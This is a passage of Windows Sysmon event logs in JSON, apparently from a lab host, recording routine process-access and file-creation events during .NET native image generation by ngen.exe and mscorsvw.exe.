{"EventTime":"2020-08-01 05:59:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7654,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:48.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D4-5F25-0000-0010543B1100}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:48.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D4-5F25-0000-0010543B1100}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7655,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:48.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D4-5F25-0000-0010543B1100}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:48.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D4-5F25-0000-0010543B1100}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7656,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:49.309\r\nProcessGuid: {A837DB8D-04D4-5F25-0000-0010543B1100}\r\nProcessId: 3892\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f34-0\\System.ServiceModel.Channels.dll\r\nCreationUtcTime: 2020-08-01 05:59:49.309","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:49.309","ProcessGuid":"{A837DB8D-04D4-5F25-0000-0010543B1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f34-0\\System.ServiceModel.Channels.dll","CreationUtcTime":"2020-08-01 05:59:49.309","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7657,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:49.356\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D5-5F25-0000-0010E6411100}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:49.356","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D5-5F25-0000-0010E6411100}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7658,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:49.356\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D5-5F25-0000-0010E6411100}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:49.356","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D5-5F25-0000-0010E6411100}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7659,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:49.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D5-5F25-0000-0010E6411100}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:49.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D5-5F25-0000-0010E6411100}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7660,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:49.450\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D5-5F25-0000-0010B5451100}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:49.450","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D5-5F25-0000-0010B5451100}","TargetProcessId":"3912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7661,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:49.450\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D5-5F25-0000-0010B5451100}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:49.450","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D5-5F25-0000-0010B5451100}","TargetProcessId":"3912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7662,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:49.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D5-5F25-0000-0010B5451100}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:49.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D5-5F25-0000-0010B5451100}","TargetProcessId":"3912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
